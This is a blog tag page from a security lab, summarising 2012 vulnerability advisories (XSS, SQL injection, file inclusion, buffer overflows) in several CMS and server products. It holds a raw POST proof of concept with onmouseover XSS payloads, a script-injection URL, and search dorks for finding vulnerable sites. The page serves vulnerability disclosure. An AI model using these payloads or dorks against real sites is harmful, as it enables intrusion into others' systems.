безбедност | Zero Science Lab

Posts Tagged ‘ безбедност ’

Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5090
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php

PoC:
POST /artpublic/recommandation/index.php HTTP/1.1 Content-Length: 619 Content-Type: application/x-www-form-urlencoded Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post "onmouseover=prompt(1) joxy adresse_destinataire adresse_expediteur lab%40zeroscience.mk asciiart_post "onmouseover=prompt(2) joxy expediteur "onmouseover=prompt(3) joxy message Hello%20World message1 %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f send Send titre_sav "onmouseover=prompt(4) joxy url_sav http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f z39d27af885b32758ac0e7d4014a61561 "onmouseover=prompt(5) joxy zd178e6cdc57b8d6ba3024675f443e920 2

2012: 05/16
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

phpThumb() v1.7.11 (dir & title) Cross-Site Scripting Vulnerability

phpThumb is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the ‘dir’ and the ‘title’ parameter of the ‘phpThumb.demo.random.php’ and ‘phpThumb.demo.showpic.php’ scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5088
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5088.php

2012: 05/16
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Andromeda Streaming MP3 Server v1.9.3.6 (s param) Remote XSS Vulnerability

Andromeda is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the ‘s’ parameter of the ‘andromeda.php’ script.

Advisory ID: ZSL-2012-5087
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5087.php

Dork: “powered by andromeda version”

PoC: http://localhost/AndromedaPHP/andromeda.php?q=s&s=”><script>alert(1);</script>

2012: 05/09
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities

Baby Gekko CMS suffers from multiple stored (post-auth) XSS vulnerabilities and path disclosure issues when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session or disclose the full installation path of the affected CMS.

——————————————————————————–

Reflected (Non-Persistent) XSS:

1. username
2. password
3. verification_code
4. email_address
5. password_verify
6. firstname
7. lastname

Stored (Persistent) XSS:

8. groupname
9. virtual_filename
10. branch
11. contact_person
12. street
13. city
14. province
15. postal
16. country
17. tollfree
18. phone
19. fax
20. mobile
21. title
22. meta_key
23. meta_description

——————————————————————————–

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php
Vendor: http://www.babygekko.com/site/news/general/baby-gekko-v1-2-0-released-with-3rd-party-independent-security-testing-performed-by-zero-science-lab.html

2012: 05/02
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities

Anchor CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Dork: “intext:Powered by Anchor, version 0.6”

Advisory ID: ZSL-2012-5085
Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5085.php

2012: 04/20
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

phpList 2.10.17 Remote SQL Injection and XSS Vulnerability

Input passed via the parameter ‘sortby’ is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The param ‘num’ is vulnerable to a XSS issue where the attacker can execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor status:

[05.03.2012] Vulnerabilities discovered.
[19.03.2012] Submited details to the vendor’s bug tracking system.
[19.03.2012] Vendor investigates, confirms and fixes the issues.
[19.03.2012] Sent patch release coordination to the vendor.
[21.03.2012] Vendor releases version 2.10.18 to address these issues.
[21.03.2012] Coordinated public security advisory released.

Advisory ID: ZSL-2012-5081
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5081.php

Vendor Advisory: https://www.phplist.com/?lid=567
https://mantis.phplist.com/view.php?id=16557

2012: 03/21
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Themida and WinLicense Vulnerabilities

The vulnerability in Themida is caused due to a boundary error in the processing of a project file, which can be exploited to cause a buffer overflow when a user opens e.g. a specially crafted .TMD file. Successful exploitation may allow execution of arbitrary code.

WinLicense is prone to an unspecified memory corruption vulnerability. An attacker can exploit this issue by tricking a victim into opening a malicious XML file to execute arbitrary code and to cause denial-of-service conditions.

Advisories:

ZSL-2012-5079 – http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5079.php
ZSL-2012-5080 – http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5080.php

2012: 03/20
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities

Zend Server and its components suffers from a cross-site scripting vulnerability. The persistent (stored) XSS issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Original Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php
TXT: http://www.zeroscience.mk/codes/zend_s03.txt
HTML: http://www.zeroscience.mk/codes/zend_s03.html

Vendor: http://www.zend.com/topics/ZS-560-SP1-ReleaseNotes-20120308.txt

2012: 03/10
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Promise WebPAM v2.2.0.13 Multiple Remote Vulnerabilities

Input passed via the parameters ‘entSortOrder’ and ‘entSort’ in ‘ent_i.jsp’ script are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The parameters ‘startTime’ and ‘endTime’ in ‘ent_i.jsp’ are vulnerable to a XSS issue where the attacker can execute arbitrary HTML and script code in a user’s browser session in context of an affected site. The parameter ‘userID’ in ‘usr_ent.jsp’ and ‘usr_t.jsp’ is vulnerable to HTTP Response Splitting which can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

Advisory ID: ZSL-2012-5077
Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5077.php

2012: 03/08
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

webgrind 1.0 (file param) Local File Inclusion Vulnerability

webgrind suffers from a file inlcusion vulnerability (LFI) when input passed thru the ‘file’ parameter to index.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

--------------------------- /index.php: ----------- 122: case 'fileviewer': 123: $file = get('file'); 124: $line = get('line'); ---------------------------

Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5075.php

Thanks to Michael Meyer, OpenVAS Project.

2012: 02/25
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Zero Science Lab

http://www.zeroscience.mk

RSS FEED

Categories / Категории

Bookz (5)
Games (1)
Graphics (18)
Internal (147)
Tools (7)

Friends / Пријатели

Calendar / Календар

May 2012
M	T	W	T	F	S	S
« Apr
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

IT.com.mk

Twitter имплементира „Не ме следи“ опција 17/05/2012
Twitter се приклучи на иницијативата на Mozilla да се воведе „Не ме следи“ опција која ќе им овозможи на корисниците да му кажат на сервисот за микро-блогирање да не им ги собира личните информации. Оваа опција е достапна веќе година дена на Firefox прелистувачот, и, иако е лесна за користење и препорачлива за секој кој... […]
IT.com.mk
Дигитални македонски телевизии од јуни 2013 година 17/05/2012
Агенцијата за електронски комуникација ја избра компанијата „Веселин“ да го дигитализира аналогниот сигнал на националните и регионалните телевизии. Директорот на АЕК, Роберт Ордановски, вели дека „Веселин“ за две недели ќе добие лиценца за национален оператор за дигитална телевизија и ќе биде обврзан да им обезбеди на четирите национални и локалните телевиз […]
IT.com.mk
Дали Македонија е навистина меѓу четирите држави со најбрз развој на ИТ услуги во светот? 17/05/2012
ИТ министерот Иво Ивановски вели дека на Светскиот самит за информатичко општество во Женева, Македонија е оценета од страна на Обединетите Нации како една од најдобрите земји во светот кога станува збор за развој на широкопојасен интернет, високиот степен на застапеност и новата генерација на мобилни мрежи. Оваа е голема пофалба за „информатичкото општество […]
Виктор Дано
Менаџирајте Facebook фан страни преку iPhone 17/05/2012
Facebook претстави нова iOS апликација Pages Manager која ќе им овозможи на админстраторите да ги менаџираат своите фан страни. Апликацијата вклучува пишување на статусти, прегледување на активноста на фановите, пристап до алатките за аналитика, или на кратко, целосен пристап до Admin Panel. Бесплатниот Pages Manager е достапeн во App Store во САД и Нов Зела […]
IT.com.mk
Google и оддаде признание на македонската заедница на корисници на слободен софтвер 17/05/2012
Google на својот блог наменет за слободен софтвер проекти објави пост за македонската слободен софтвер заедница. Ок, постот не е напишан од Google, туку од Тамара Атанасоска, член на оваа заедница и студент на Google Summer of Code. Но, сепак самата објава на официјалниот блог е одлично признание за работата на оваа заедница. Тамара во... […]
IT.com.mk
Google го претстави Knowledge Graph, најголемата новина во пребарувањето до сега 16/05/2012
Google полека, но сигурно започнува да го воведување долгоочекуваното семантичко пребарување што комплетно ќе го промени начинот на како наоѓаме информации на интернет. Новината, сега позната како Knowledge Graph, треба да ви ги донесе резултатите кои ги посакувате без да се губите по веб страни и линкови. Сега со Кnowledge Graph кога ќе пребарувате термин.. […]
Виктор Дано
Новиот iPhone ќе има поголем екран 16/05/2012
Новиот iPhone ќе има 4-инчен екран, малку поголем од 3,5 инчниот кој го видовме на сите пет генерации на паметниот тeлефон од Apple, дознава Wall Street Journal повикувајќи се на анонимни извори блиски до компанијата кои велат дека Apple нарачал поголеми екрани од своите азиски партнери. Информацијата подоцна беше потврдена и од Reuters. Но, освен... […]
IT.com.mk
Новиот iPad пристигна во Дуна Компјутери 16/05/2012
Новиот iPad сега е достапен во Дуна Компјутери, кои се официјалниот партнер на Apple продукти во Македонија. Таблетот беше достапен на македонскиот пазар уште од мај, но oд неофицијални претпродавачи. Најголемата новина во новиот iPаd, кој е трета верзија на популарниот компјутер, е Retina дисплејот со висока резолуција од 2048 x 1536 пиксели. Работи на... […]
Виктор Дано
E-потсетникот на МИОA ќе ве потсетува за досадните административни обврски 16/05/2012
ИТ министерството го претстави Е-потсетник, нов веб сервис кој преку SMS порака или имејл ќе ги потсетува граѓаните за нивните административни обврски како пријавување на новороденче, лиценца за категоризација на хотели, издавање на работни дозволи за странци, потсетување за дозвола за поставени реклами на државни патишта и други досадни административни рабо […]
IT.com.mk
„Мое осигурување, мој доктор“ е нов веб сервис за проверка на здраствено осигурување 16/05/2012
Основната цел на веб сервисот „Мое осигурување, мој доктор“ е скратување на времето, намалувањее на гужвите и полесно остварување на правата како на осигурениците така и на избраните лекари, вели Фондот за здраствено осигурување на Македонија. „За да се користат овие услуги потребно е да се има само компјутер интернет и мало познавање за истите.“... […]
IT.com.mk

Exploit Database

[dos] - Trigerring Java Code from a SVG Image 16/05/2012
Trigerring Java Code from a SVG Image […]
[webapps] - Artiphp CMS 5.5.0 Database Backup Disclosure Exploit 16/05/2012
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit […]
[webapps] - OpenKM Document Management System 5.1.7 Command Execution 16/05/2012
OpenKM Document Management System 5.1.7 Command Execution […]
[webapps] - Axous 1.1.1 Multiple Vulnerabilities (CSRF - Persistent XSS) 16/05/2012
Axous 1.1.1 Multiple Vulnerabilities (CSRF - Persistent XSS) […]
[webapps] - Serendipity 1.6 Backend XSS And SQLi Vulnerability 15/05/2012
Serendipity 1.6 Backend XSS And SQLi Vulnerability […]
[webapps] - Liferay Portal 6.1 - 6.0.x Privilege Escalation 15/05/2012
Liferay Portal 6.1 - 6.0.x Privilege Escalation […]
[dos] - Multimedia Builder 4.9.8 Malicious mef Crash 15/05/2012
Multimedia Builder 4.9.8 Malicious mef Crash […]
[webapps] - b2ePMS 1.0 Authentication Bypass Vulnerability 15/05/2012
b2ePMS 1.0 Authentication Bypass Vulnerability […]
[dos] - FlexNet License Server Manager Stack Overflow In lmgrd 14/05/2012
FlexNet License Server Manager Stack Overflow In lmgrd […]
[dos] - Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities 14/05/2012
Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities […]

Rete Mirabilia

Macedonian information security research and development laboratory

Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

phpThumb() v1.7.11 (dir & title) Cross-Site Scripting Vulnerability

Andromeda Streaming MP3 Server v1.9.3.6 (s param) Remote XSS Vulnerability

Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities

Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities

phpList 2.10.17 Remote SQL Injection and XSS Vulnerability

Themida and WinLicense Vulnerabilities

Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities

Promise WebPAM v2.2.0.13 Multiple Remote Vulnerabilities

webgrind 1.0 (file param) Local File Inclusion Vulnerability

Zero Science Lab

Categories / Категории

Recent Posts / Последни Написи

Friends / Пријатели

Calendar / Календар

IT.com.mk

Exploit Database

Rete Mirabilia

Macedonian information security research and development laboratory

Zero Science Lab

Categories / Категории

Recent Posts / Последни Написи

Friends / Пријатели

Calendar / Календар

Tags / Тагови

Rete Mirabilia